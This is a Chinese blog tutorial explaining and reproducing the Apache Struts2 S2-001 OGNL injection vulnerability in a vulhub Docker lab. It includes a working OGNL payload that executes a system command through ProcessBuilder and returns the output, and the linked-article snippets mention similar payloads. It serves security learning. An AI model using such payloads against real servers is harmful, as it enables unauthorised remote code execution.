Struts2漏洞 (S2-001)漏洞原理及复现

已于 2023-09-09 20:55:43 修改
阅读量478 收藏
点赞数
分类专栏: 网络安全 文章标签: struts java 安全 web安全
于 2023-09-09 20:48:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73180072/article/details/132781475
版权

一、漏洞原理

涉及软件:  Apache Struts2(java代码写的开发框架)
涉及业务: javaweb应用程序
爆发功能点: Struts2标签处理功能altSyntax(此标签提供标签处理功能)
涉及语言:  OGNL(对象图导航语言)
注入点:  OGNL表达式注
爆发条件: 

1. Struts2中允许用户提交包含OGNL表达式字符串的表单数据;

2.若表单验证失败,服务器会将用户提交的OGNL表达式进行解析执行;

漏洞别称Struts2标签解析代码实际上是在XWork中,故也称为XWork2漏洞
涉及版本Struts 2.0.0 - 2.0.8
WebWork 2.2.0 - 2.2.5
WebWork 2.1 (启用altSyntax)

二、payload解析


" %{}  ” 在OGNL表达式中经常出现,它提供了一个OGNL表达式运行环境,可以在%{}中填入需要运行的代码,例:

%{1+1}
%{#user.username}

三、漏洞复现(vulhub)

启动vulhub靶场 ,cd命令切换至 vulhub/Struts2/S2-001 目录下,使用以下命令拉取靶场镜像

docker-compose up -d

默认8080端口,访问靶机

在表单中输入,页面返回结果”2“,说明代码被解析。

%{1+1}

更换payload,代码运行成功,查询当前用户为root,漏洞验证成功

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

TIME908
关注
专栏目录
漏洞复现Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3420
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
漏洞复现Struts2 S2-046 远程命令执行漏洞 (CVE-2017-5638)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 952
CVE-2017-5638 即st2-045/st2-046漏洞,影响范围Struts 2.3.5-2.3.31,Struts 2.5-2.5.10Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。...
s2-001漏洞复现
m0_74859491的博客
03-13 572
开启docker进入vulhub —struts2s2-001命令:cd vulhub/struts2/s2-001。执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat。(Readme.md 英文说明, Readme.zh-cn.md 中文说明)先查看说明文件 命令:cat Readme.zh-cn.md。3、启用测试环境:docker-compose up -d。回显出路径:/usr/local/tomcat。请参阅《中华人民共和国网络安全法》
Struts2_001_RCE 漏洞复现
ADummy的博客
02-04 437
Struts2_001_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 我们来了解一下Struts2 中的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提
Struts2 远程代码执行漏洞复现S2-001
最新发布
Welcome To Myon'Blog !
03-14 1232
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Struts2 S2-001 远程代码执行漏洞——漏洞复现
weixin_42090431的博客
12-01 112
漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。​ 此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。
S2-001 漏洞复现
qq_36594628的博客
07-23 475
S2-001 一、漏洞原理 ​ 因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 二、影响版本 ​ Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注:我的虚拟
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
Apache Struts2是一款非常...通过深入理解漏洞原理,采取相应的预防措施,可以显著降低被攻击的风险。在压缩包文件中,可能包含了详细的安全分析报告、补丁应用指南以及示例代码,这些都是帮助修复此问题的重要资源。
vulhub struts2漏洞搭建与复现s2-001 s2-005)
wocao___的博客
02-20 945
s2-001 github下载vulhub git clone https://github.com/vulhub/vulhub.git 下载完成后进入目录vulhub/struts2/s2-001 docker-compose up -d 启动 docker ps查看容器运行状态 浏览器访问ip+端口 查看目录vulhub/struts2/s2-001中的readme中文说明 S2-001 远程代码执行漏洞 原理 参考 http://rickgray.me/2016/05/06/rev
Apache Struts2远程代码执行漏洞(S2-001)复现
oiadkt的博客
05-04 2839
Apache Struts2远程代码执行漏洞(S2-001)复现
S2-001 远程代码执行漏洞
玄道的网安博客
06-27 166
前言 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 环境搭建 使用docker和vulhub搭建环境 cd vulhub/struts2/s2-001 docker-compose build&&.
漏洞学习---S2-001 远程代码执行漏洞
qq_37698661的博客
06-17 338
漏洞原理 ​ 由于用户提交表单数据并且验证失败时,后端会将用户先前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据当中,在真实的测试环境中,遇到注册或登录界面,存在提交数据失败情况,则后端会返回之前提交的数据信息,若后端使用%{value}对提交的数据执行了OGNL表达式解析,那么可以利用这点,直接构造payload进行远程代码执行操作. 漏洞环境 #使用vulhub进行漏洞演示 /vulhub-master/struts2/s2-001 docker-compose b
struts2代码执行漏洞
收集盒 Book box
06-28 631
刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞, 具体的漏洞说明地址 https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt  还是热乎的,我大概白话一下。 这个漏洞的级别很高,都升级修补一下。  影响版本是2.3.1和2.3.1之前的版本 解
S2-001 远程代码执行漏洞复现
不想当脚本小子的脚本小子
02-06 152
http://note.youdao.com/noteshare?id=09d9a796147a43e5a81126e6748a84e3&sub=E2B01A814E164ED1B0595125B1050F4D
struts2远程代码执行漏洞汇总整理
热门推荐
dl71181的博客
05-30 1万+
一、S2-001 1、漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果。 举个例子,当你提交的登录表单为username=xishir&password=%{1+1}时,后端验证登录失败后会返回登录界面并显示你的输入,这时password字段中的OGNL表达式已经被解析处理过了,所以会显示%{1+1}的解析结果2...
S2-001漏洞复现
baidu_38844729的博客
11-14 390
漏洞原理 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 漏洞利用 切换到s2-001目录下,搭建启动测试环境 ...
struts2s2-001)远程代码执行漏洞docker&&vulhub复现
qq_43455259的博客
07-12 2048
struts2s2-001)远程代码执行漏洞docker&&vulhub复现
墨者Apache Struts2远程代码执行漏洞(S2-001)题解
zr1213159840的博客
01-07 456
这题明确说了是什么漏洞,咱们在网上找利用即可,并且参考链接中也提供了相应的信息 官方这个说明说,在表单中填入%{1+1}如果回显为2的话,说明存在这种漏洞,最后我们测试发现,在密码中输入这个式子会回显为2,说明存在这个漏洞,其中的账号随便输 接着拿下面这个exp直接获取到key %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,"/key.txt"})).redirectErrorStream(true).start(),
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞原理Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值